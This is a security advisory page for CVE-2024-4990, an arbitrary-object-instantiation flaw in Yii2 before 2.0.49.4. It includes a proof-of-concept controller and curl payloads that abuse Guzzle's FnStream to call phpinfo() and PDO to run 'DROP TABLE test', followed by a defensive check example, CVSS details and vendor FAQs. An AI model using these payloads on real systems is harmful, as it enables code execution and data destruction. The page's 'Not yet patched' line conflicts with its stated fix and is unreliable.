CVE-2024-4990

CVE-2024-4990 is a high-severity security vulnerability in yiisoft/yii2 (composer), affecting versions < 2.0.49.4. It is fixed in 2.0.49.4.

Summary

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
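The missing check is the whole bug: the class named in `$value` must be verified to be a Behavior before anything is instantiated, because a constructor and setters run as soon as the object is created. The following is an added, self-contained illustration of such a check; it is not Yii's code, and the stand-in `Behavior` class, the helper names and the acceptance of both the `class` and `__class` configuration keys are assumptions for this demo.

```php
<?php
// Added example (not yiisoft/yii2 code). Stand-in classes model the situation
// described in the advisory: a Behavior base class and an unrelated class that
// happens to be loadable through the autoloader.
class Behavior {}                          // stand-in for yii\base\Behavior
class LoggingBehavior extends Behavior {}  // a legitimate behavior
class NotABehavior {}                      // any other reachable class

/**
 * Derive the class name an "as <name>" value would instantiate: a Behavior
 * instance, a class-name string, or a config array with a 'class'/'__class'
 * key (assumed convention). Returns null when no class name can be derived.
 */
function behaviorClassName(mixed $value): ?string
{
    if ($value instanceof Behavior) {
        return get_class($value);
    }
    if (is_string($value)) {
        return ltrim($value, '\\');            // "\\PDO" and "PDO" are the same class
    }
    if (is_array($value)) {
        $class = $value['__class'] ?? $value['class'] ?? null;
        return is_string($class) ? ltrim($class, '\\') : null;
    }
    return null;
}

/**
 * Reject anything that is not Behavior or a subclass of it BEFORE any object
 * is created, so a foreign class never gets its constructor or setters invoked.
 */
function assertBehaviorConfig(mixed $value): void
{
    $class = behaviorClassName($value);
    $ok = $class !== null
        && ($class === Behavior::class || is_subclass_of($class, Behavior::class, true));
    if (!$ok) {
        throw new InvalidArgumentException('Value must be a Behavior instance, class name or configuration');
    }
}

// Constructed inputs: two legitimate values, then two shaped like untrusted
// request data (a foreign class with constructor args and a setter, and a plain string).
$inputs = [
    'valid class string' => LoggingBehavior::class,
    'valid config array' => ['class' => LoggingBehavior::class],
    'foreign class'      => ['__class' => NotABehavior::class, '__construct()' => [[]], 'someProp' => 'x'],
    'non-class string'   => 'not_a_class',
];
foreach ($inputs as $label => $value) {
    try {
        assertBehaviorConfig($value);
        echo "$label: accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected\n";
    }
}
```

The first two inputs are accepted and the last two are rejected; the same class check belongs in any code path that turns untrusted data into `Yii::createObject()` arguments.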

Workarounds

No workaround available.

References

Reported Here

In case the link is dead, here is the full description:

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Depending on the installed dependencies various kind of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started.

Yii JSON parser was enabled in the configuration:

'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]

A vulnerable controller was added:

<?php

namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}

Executing phpinfo()

Following command stores the content of phpinfo() inside info.html:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html

It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior); however, the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (e.g. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks like there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing an anonymous user to gain admin access, with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.

Occurrences

Component.php L191

Impact

With some effort, malicious code can be injected and executed, which might do anything ranging from deleting files to dropping database tables.

CVE-2024-4990 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.49.4); upgrading removes the vulnerable code path.

Affected versions

yiisoft/yii2 (< 2.0.49.4)

Security releases

yiisoft/yii2 → 2.0.49.4 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Not yet patched.

Frequently Asked Questions

  1. What is CVE-2024-4990? CVE-2024-4990 is a high-severity security vulnerability in yiisoft/yii2 (composer), affecting versions < 2.0.49.4. It is fixed in 2.0.49.4.
  2. How severe is CVE-2024-4990? CVE-2024-4990 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yiisoft/yii2 are affected by CVE-2024-4990? yiisoft/yii2 (composer) versions < 2.0.49.4 are affected.
  4. Is there a fix for CVE-2024-4990? Yes. CVE-2024-4990 is fixed in 2.0.49.4. Upgrade to this version or later.
  5. Is CVE-2024-4990 exploitable, and should I be worried? Whether CVE-2024-4990 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2024-4990 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2024-4990? Upgrade yiisoft/yii2 to 2.0.49.4 or later.

